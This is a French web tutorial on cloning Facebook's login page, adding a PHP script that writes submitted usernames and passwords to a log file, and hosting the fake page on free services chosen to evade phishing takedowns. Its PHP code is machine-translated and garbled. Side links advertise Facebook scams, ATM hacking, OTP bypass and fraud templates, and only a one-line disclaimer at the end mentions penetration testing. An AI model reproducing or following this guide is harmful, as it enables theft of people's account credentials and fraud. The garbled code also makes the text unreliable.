Comment créer une page de phishing facebook 2021

Comment créer un lien de phishing Facebook

Récemment, j’ai rencontré de nombreux guides sur la création de pages de phishing. Bien que les principes de chaque guide soient similaires, la plupart des solutions d’hébergement fournies dans le guide ne fonctionnent plus en raison d’une augmentation de la répression des pages de phishing par les sociétés d’hébergement. Dans ce guide, je passerai par toutes les étapes nécessaires pour créer et héberger une page de phishing de votre choix. Amusez-vous bien!

Télécharger l’Index HTML de la page Web cible

Pour commencer, vous devez obtenir l’index HTML de la page. Il existe différentes méthodes pour ce faire, il existe même des modèles en ligne pour les sites populaires. Dans ce tutoriel, je vais utiliser le moyen le plus basique afin d’être aussi convivial que possible.

Lire aussi: comment créer un site de phishing à l’aide de kali linux

Accédez à votre page Web

Dans ce tutoriel, je vais phisher Facebook.

Voir la source de la page Web.

Selon votre navigateur, il peut y avoir différentes méthodes. Normalement, cela se fait en cliquant avec le bouton droit sur le site et en cliquant sur « Voir la source ». Je l’ai fait sur mon navigateur et un Windows devrait être similaire à celui-ci:

Sur la case à droite se trouve la source du site Web. Ce qui conduit à l’étape suivante:

Téléchargement et enregistrement du Code Source

Sélectionnez la boîte et copiez-collez tout ce qui se trouve dans la boîte dans un document txt. Utilisez le bloc-notes sous Windows et un programme d’édition de texte simple si vous n’utilisez pas Windows. (N’utilisez pas de programmes comme Word ou Pages car c’est vraiment lent). Une fois cela fait, cliquez sur « Enregistrer sous » ou sur l’option qui vous permet d’enregistrer ce document. Sur le bloc-notes, cela devrait ressembler à ceci:

Changez « Enregistrer sous type » pour Tous les fichiers et changez l’encodage en Unicode.

Après cela, nommez le document « index.html », évidemment sans les marques de discours.

Félicitations! Vous avez terminé la première étape du tutoriel!

Lire aussi: Comment faire une arnaque Facebook sans être banni ou bloqué

LEÇON 2

Créer un fichier PHP pour la récolte de mots de passe

Le fichier PHP est essentiellement l’outil qui récolte le mot de passe des utilisateurs dans ce scénario. Il y a plusieurs façons de créer ce PHP si vous avez des connaissances en programmation, mais si vous ne le faites pas, copiez simplement mon exemple PHP.

<?php

en-tête (‘Emplacement: facebook.com’);

$ handle = fopen(« log.txt », « a »);

foreach(__POST asvariablevariable = >valuevaleur) {

fwrite(handlehandle,variablevariable);

fwrite(handlehandle, « = »);

fwrite(handlehandle,valuevalue);

fwrite(handlehandle, « \r\n »);

}

fwrite(handlehandle, « \r\n\n\n\n »);

fclose(handlepoignée);

sortie;

?>

Comme ci-dessus, enregistrez le fichier PHP sous « Tous les fichiers » et sous « post.php ». Changez l’encodage en Unicode et vous devriez être prêt à partir!

Modifiez le Fichier HTML de la Page pour y Incorporer Votre Fichier PHP.

Maintenant, nous devons incorporer notre fichier PHP, pour recevoir les mots de passe que les utilisateurs envoient.

Trouvez la méthode d’envoi de mot de passe

Tout d’abord, vous devez voir comment le site Web traite lorsque l’utilisateur soumet un nom d’utilisateur-mot de passe.

Pour Facebook, il vous suffit de Ctrl-F et de taper « =action » dans le champ.

Maintenant, vous devez remplacer tout dans la partie soulignée par « post.php », gardez les marques de discours. (un seul ensemble s’il vous plait).

Évidemment, cette méthode sera différente pour les autres sites Web. Une bonne méthode pour le trouver consiste à utiliser l’outil Inspecter les éléments dans la plupart des navigateurs modernes et à cliquer sur le bouton de connexion. Trouvez quelque chose de similaire à la méthode ci-dessus.

Lire aussi: Apprenez à pirater des cartes ATM, des machines utilisant le logiciel Wizcardo

Remarque: Vous devrez changer cela plus tard lorsque vous hébergerez réellement le site Web.

Hébergement du fichier PHP pour le stockage du mot de passe

Maintenant, voici la partie juteuse, rendant votre faux site Web en ligne pour que d’autres personnes puissent le parcourir.

Vous pouvez utiliser n’importe quel service d’hébergement gratuit pour héberger et stocker des mots de passe. Cependant, le plan d’hébergement doit inclure quelque chose appelé « FTP ». Pour ce tutoriel, j’utiliserai 000webhost.

Accédez au serveur FTP de votre Service d’hébergement Web

Pour cette étape, je suppose que vous avez déjà créé un site Web avec votre service d’hébergement.

Pour 000webhost, il vous suffit de cliquer sur « Gestionnaire de fichiers » et de cliquer sur « Télécharger des fichiers ». Voici une image du serveur FTP pour 000webhost:

Ignorez les autres fichiers, ce ne sont que quelques-uns de mes trucs personnels, sans rapport avec ce tutoriel.

Téléchargez vos fichiers PHP et Modifiez l’autorisation

Comme vous pouvez le voir, j’ai déjà téléchargé mon fichier PHP. Mais vous devez simplement le télécharger dans le dossier principal de votre serveur FTP. (Certains serveurs FTP ne vous permettent pas de télécharger dans le dossier racine, suivez simplement leurs instructions particulières).

Maintenant, vous devez changer l’autorisation en « 777 », qui est essentiellement chaque autorisation. Lorsque vous êtes invité à cocher les cases pour les autorisations, cochez simplement chacune d’elles.

Maintenant, vous pouvez fermer le serveur FTP. Notez votre adresse web!

Lire aussi: Instructions Étape pour contourner la vérification OTP Sur Tous les sites Web

Hébergeant la page de Phishing réelle

Pour cette étape, vous devrez utiliser le fournisseur d’hébergement exact que j’utilise, sinon vous serez banni.

Il y a une raison pour laquelle je n’utilise pas le même fournisseur d’hébergement pour ma page réelle, et c’est parce que la plupart des fournisseurs d’hébergement utiliseront une sorte d’analyse pour détecter les pages de phishing. Je peux essayer plusieurs services d’hébergement dans le passé et tous m’ont interdit dans les 30 minutes suivant le téléchargement du fichier d’index.

Configuration de la publication.forum php

Maintenant, avant d’héberger le site Web, rappelez-vous le message.chose de formulaire php / login que nous avons configurée ci-dessus?

Vous devez retrouver le formulaire de connexion dans votre index.html et remplacez le « post.php » avec « http://yourwebsiteforyourpostphpupload/post.php », en supposant que vous avez téléchargé dans le dossier racine. N’oubliez pas d’ajouter http:// devant le site. Pour tester cela, accédez au site Web (http://yourwebsiteforyourpostphpupload/post.php) et voyez s’il vous redirige vers Facebook.avec, si c’est le cas, vous avez collé le bon site. Si ce n’est pas le cas, vérifiez si vous avez téléchargé votre fichier dans le bon répertoire.

Hébergement de la Page actuelle

Naviguer vers htmlpasta.com . Vous verrez quelque chose de similaire à ceci:

Ensuite, vous devez copier l’index.fichier html pour votre site de phishing et collez-le ici.

Maintenant, cliquez sur le re et cliquez sur coller, vous obtiendrez un lien pour votre site Web.

Conclusion

Félicitations! Vous avez fini d’héberger votre premier site de phishing ! Accédez à votre site et essayez d’entrer de faux détails de connexion, après avoir cliqué sur le bouton de connexion, il devrait vous rediriger vers facebook.com . Connectez-vous à votre serveur FTP sur lequel vous avez hébergé votre publication.fichier php, et il devrait y avoir un nouveau document appelé Journal.txt qui est stocké dans le même dossier que votre publication.fichier php. Tous les détails de connexion doivent y être stockés.

Lire aussi: Format yahoo yahoo 2020, format de facturation, téléchargement pdf

Veuillez ne pas l’utiliser à des fins malveillantes, utilisez uniquement pour des tests de pénétration et avec l’autorisation de votre victime.